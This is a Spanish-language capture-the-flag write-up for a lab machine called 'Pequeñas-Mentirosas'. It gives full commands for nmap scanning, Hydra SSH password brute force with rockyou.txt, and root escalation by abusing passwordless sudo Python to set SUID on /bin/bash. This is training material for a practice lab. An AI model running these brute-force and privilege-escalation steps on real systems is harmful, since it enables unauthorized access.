> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/pequenas-mentirosas-write-up.md).

# Pequeñas-Mentirosas write-up

## **Verificamos si tenemos conexión con la máquina víctima**

<figure><img src="/files/n2K8W6NsdkECIfJlCfwN" alt=""><figcaption></figcaption></figure>

## **Realizamos un escaneo de puertos abiertos de la máquina víctima**

Usamos la herramienta **Nmap** para realizar una escaneo de puertos abiertos con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -O -Pn -n 172.17.0.2
```

<figure><img src="/files/cCtZtTCf6xDmxENP6pcH" alt=""><figcaption></figcaption></figure>

Nos encontramos que tiene el puerto 22 (SSH) y el 80 (HTTP) abiertos, así que a continuación ponemos la IP de la máquina víctima en el navegador y nos encontramos con lo siguiente:

<figure><img src="/files/Qr3eCqReMB6Ac1IPVqK2" alt=""><figcaption></figcaption></figure>

Esto nos dice que `a` podría ser un posible usuario del servicio SSH, así que ahora lo que haremos será un ataque con fuerza bruta a este servicio con la herramienta **Hydra** usando el siguiente comando:

```bash
hydra -l a -P /home/shinki/Escritorio/rockyou.txt -vV ssh://172.17.0.2
```

<figure><img src="/files/A1KqFZZRGp8aOm8JioD9" alt=""><figcaption></figcaption></figure>

Y encontramos que la contraseña del usuario `a` es `secret`. Utilizando estas credenciales, accedimos a la máquina víctima a través del servicio SSH.

<figure><img src="/files/NFyfvcZoTRCO7jzzWotJ" alt=""><figcaption></figcaption></figure>

## **Intrusión en la máquina víctima**

Una vez dentro de la máquina víctima nos damos cuenta de que existe otro usuario llamado `spencer`, así que realizaremos otro ataque de fuerza bruta con **Hydra** con el siguiente comando:

```bash
hydra -l spencer -P /home/shinki/Escritorio/rockyou.txt -vV ssh://172.17.0.2 
```

<figure><img src="/files/gTi4vSCPQjxCPgZ3NnDF" alt=""><figcaption></figcaption></figure>

Lo cual nos indica que la contraseña del usuario `spencer` es `password1`. Así que iniciamos sesión como el usuario `spencer` con el siguiente comando:

```bash
su spencer
```

<figure><img src="/files/BgsoeGmOWgTvBSl4ujO5" alt=""><figcaption></figcaption></figure>

Y ahora al ejecutar el comando `sudo -l` nos indica que podemos ejecutar **Python** como cualquier usuario sin necesidad de usar contraseña.

<figure><img src="/files/ZxxGqhyGPyrwUQjRPMPw" alt=""><figcaption></figcaption></figure>

Así que nos dirigimos al directorio `/home/spencer/` y ejecutamos el siguiente comando, que lo que hará será crear un archivo.py que al ejecutarlo dará permisos SUID a el binario **Bash**, por lo que podremos obtener una shell con privilegios root.

```bash
echo "import os    
  
os.system('chmod "u+s /bin/bash"')" > archivo.py
```

Ya solo quedaría ejecutarlo con **Python** de la siguiente manera:

```bash
sudo /usr/bin/python3 archivo.py 
```

<figure><img src="/files/lE7PTiMSZycVmEvRJPWW" alt=""><figcaption></figcaption></figure>

Y para finalizar ejecutamos `bash -p` para obtener una shell con privilegios elevados.

<figure><img src="/files/RQln0d2hzWrCUB123Oeo" alt=""><figcaption></figcaption></figure>
